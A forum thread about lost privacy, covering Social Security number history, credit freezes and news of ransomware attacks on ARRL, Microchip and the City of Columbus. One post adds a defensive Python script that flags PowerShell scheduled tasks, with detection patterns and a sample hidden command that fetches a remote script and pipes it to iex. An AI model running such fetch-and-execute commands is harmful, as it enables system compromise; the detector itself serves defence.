Privacy lost...

nsaspook

Joined Aug 27, 2009
16,328
This is what my original card looked like.
1723421930353.png
I got mine as a kid, when anyone could complete the form with any name they wanted and get the card in the mail. No ID needed. They have never been secure.

It was also used as your military service number in the 70's so it was never secure during that time frame for VETs.
https://www.archives.gov/personnel-records-center/social-security-numbers
 

WBahn

Joined Mar 31, 2012
32,854
This is something that is coming full circle.

When I was a kid, your SSN wasn't used for anything except what it was supposed to be used for. Join a club? They assigned you a member ID. Become a student? They assigned you a student ID. Join the military? They assigned you a service ID. I think a big part of the reason for this was that many people didn't get a SSN until they absolutely had to, usually when they got their first job that withheld FICA taxes. Filing taxes? You might need an SS number, depending on the specifics. Claiming dependents on your taxes? No need for the dependents to have an SSN, so no reason for parents to get them one. I got mine in third grade, but only because a friend and I found out that we COULD get one, and so one summer day we bicycled down to the post office, about three miles away, and filled out the application. So organizations couldn't assume that new members would have an SSN, let alone anything else that could serve as a reasonably-certain unique ID number. SS cards have always said (at least my first one that I got issued in the early 1970s, and which I still have) that the card (and, by inference, the number) was not to be used for any other purpose. But then the federal government decided that you couldn't claim kids as a dependent unless they had an SSN, so of course parents got their kids SSNs. Now, organizations had a pretty reliable way to assign a unique number to new members and, let's admit it, it was damn convenient for the members to only have a single number that served as their ID number for most of the organizations they were members of or had associations with. Even the military used your SSN as your service number. It got to the point that when you wrote a check, they wanted both your driver's license number and your SSN written on the check to give them a better ability of seeking recourse if the check bounced. In fact, for a number of years, I had my checks preprinted with my DLN and SSN to save the hassle.

Fast forward, and we get to the point that so many people are using the SSN as an ID number of one kind or another for so many organizations, that knowing someone's SSN is a prime way to pry the lid off of their personal accounts for all kinds of illegal activities and getting their SSN is trivially easy. So the federal government makes it illegal for organizations to use your SSN as membership IDs or to publish them in any except closely held and confidential documents. But, of course, they exempted themselves from those requirements, giving the government an extra decade or so to come into compliance with the rules it was forcing everyone else to adopt in just a couple of years.
 

joeyd999

Joined Jun 6, 2011
6,303
Why is a browser extension allowed to modify the OS (or do anything outside the context of the browser)?

https://www.tomsguide.com/computing...-that-steal-your-personal-data-what-to-do-now

The hackers behind it have created lookalike sites that impersonate popular software and services like Roblox FPS Unlocker, YouTube, VLC media player, Steam or Keepass. While potential victims think they’re installing legitimate software or extensions, they’re actually downloading a trojan that installs the malicious extensions used by this malware.

The digitally signed malicious installers used in this campaign register a scheduled task on vulnerable PCs that then executes a PowerShell script which downloads and executes the next-stage payload from a hacker-controlled remote server.
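
Added example, not part of the original post or the quoted article: a defender-side check that reads a scheduled task definition in Task Scheduler's XML form and flags Exec actions that launch PowerShell with network-fetch or evasion indicators, the persistence pattern the article describes. The indicator patterns, the `review_task` name and both sample tasks are assumptions constructed for this illustration.

```python
import re
import xml.etree.ElementTree as ET

# XML namespace used by Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristic indicators (assumed for this example, not taken from the article).
SHELL = re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b")
FETCH = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                   r"invoke-restmethod|\birm\b|start-bitstransfer|https?://)")
EVASION = re.compile(r"(?i)(-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|"
                     r"-ex(ec|ecutionpolicy)?\s+bypass|\biex\b|invoke-expression)")

def review_task(task_xml):
    """Return findings for every Exec action that launches PowerShell."""
    root = ET.fromstring(task_xml)
    findings = []
    for action in root.iterfind("./t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS) or ""
        args = action.findtext("t:Arguments", "", NS) or ""
        # PowerShell may be the command itself or be started via cmd /c.
        if not SHELL.search(command + " " + args):
            continue
        if FETCH.search(args):
            findings.append("powershell-network-fetch")
        if EVASION.search(args):
            findings.append("powershell-evasion-flags")
    return findings

# Constructed sample: hidden PowerShell that fetches and runs remote content.
SUSPICIOUS = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-WindowStyle Hidden -Command "iwr https://example.invalid/stage.ps1 | iex"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: routine maintenance task running a local script.
BENIGN = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoProfile -File C:\Scripts\rotate-logs.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(review_task(SUSPICIOUS), review_task(BENIGN))
```
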
 

nsaspook

Joined Aug 27, 2009
16,328
https://therecord.media/china-linked-hackers-russia-state-agency-attacks

China-linked hackers could be behind cyberattacks on Russian state agencies, researchers say

Hackers have targeted dozens of computers belonging to Russian state agencies and tech companies with malicious tools linked to Chinese threat actors, according to a new report.
In a campaign dubbed EastWind discovered late last month by researchers at Russian cybersecurity firm Kaspersky, the attackers used the GrewApacha remote access trojan (RAT), an unknown PlugY backdoor and an updated version of CloudSorcerer malware, which was previously used to spy on Russian organizations.

 

WBahn

Joined Mar 31, 2012
32,854
It's completely naive to think that these things won't continue to happen. There are just too many places that have access to too much data to ever hope that every single one of them is going to be secure, particularly when so many of those sites routinely farm out major portions of their activities (and responsibilities) to third parties based on who is the lowest bidder. Sometimes that lowest bidder is the lowest bidder precisely because what they want is not the contract to make a profit on the job, but access to the data that the contract affords.

The most relevant part of the article, in my opinion, was this:

The point is, if you’re an American who hasn’t frozen their credit files and you haven’t yet experienced some form of new account fraud, the ID thieves probably just haven’t gotten around to you yet.
The article also points out something that I was aware of, but completely forgot, which is that we (Americans) are now entitled to a free credit report from each of the three credit bureaus every week, instead of just annually.
 

nsaspook

Joined Aug 27, 2009
16,328
https://www.arrl.org/news/arrl-it-security-incident-report-to-members
ARRL IT Security Incident - Report to Members
Sometime in early May 2024, ARRL’s systems network was compromised by threat actors (TAs) using information they had purchased on the dark web. The TAs accessed headquarters on-site systems and most cloud-based systems. They used a wide variety of payloads affecting everything from desktops and laptops to Windows-based and Linux-based servers. Despite the wide variety of target configurations, the TAs seemed to have a payload that would host and execute encryption or deletion of network-based IT assets, as well as launch demands for a ransom payment, for every system.

This serious incident was an act of organized crime. The highly coordinated and executed attack took place during the early morning hours of May 15. That morning, as staff arrived, it was immediately apparent that ARRL had become the victim of an extensive and sophisticated ransomware attack. The FBI categorized the attack as “unique” as they had not seen this level of sophistication among the many other attacks they have experience with. Within 3 hours a crisis management team had been constructed of ARRL management, an outside vendor with extensive resources and experience in the ransomware recovery space, attorneys experienced with managing the legal aspects of the attack including interfacing with the authorities, and our insurance carrier. The authorities were contacted immediately as was the ARRL President.
It was also clear that they believed ARRL had extensive insurance coverage that would cover a multi-million-dollar ransom payment. After days of tense negotiation and brinkmanship, ARRL agreed to pay a $1 million ransom. That payment, along with the cost of restoration, has been largely covered by our insurance policy.
 

nsaspook

Joined Aug 27, 2009
16,328
https://www.securityweek.com/ransomware-gang-leaks-data-allegedly-stolen-from-microchip-technology/

Ransomware Gang Leaks Data Allegedly Stolen From Microchip Technology
The Play ransomware group has published gigabytes of data allegedly stolen from US semiconductor supplier Microchip Technology.
We are aware of claims made by a third party relating to the recent IT disruption we disclosed. We take this issue very seriously and have notified law enforcement. Microchip continues to work diligently on our investigation and remediation efforts with the assistance of our external cybersecurity advisors.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a
Play Ransomware
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
 

nsaspook

Joined Aug 27, 2009
16,328
https://arstechnica.com/security/20...r-he-discloses-severity-of-ransomware-attack/
City of Columbus sues man after he discloses severity of ransomware attack
Mayor said data was unusable to criminals; researcher proved otherwise.
Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross alerting reporters to the information, which it claimed would not be easily obtained by others.


“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”
The Mayor is IMO being made a fool by someone in government with their job on the line for the data loss.

It's easy to see the data is in a SQL database format like you would expect. It's not corrupted, it's just a DB file.
https://www.nbc4i.com/news/investig...affects-residents-and-what-has-been-released/
1725325682970.png
“This is Microsoft SQL Server. So anyone can download this,” Goodwolf said. “There’s been multiple versions throughout the years. Some of those databases can only be restored on very specific versions from like 2012. This one’s asking about 2022 and some of the databases can be restored to that one. Each version has its own backup format.”
 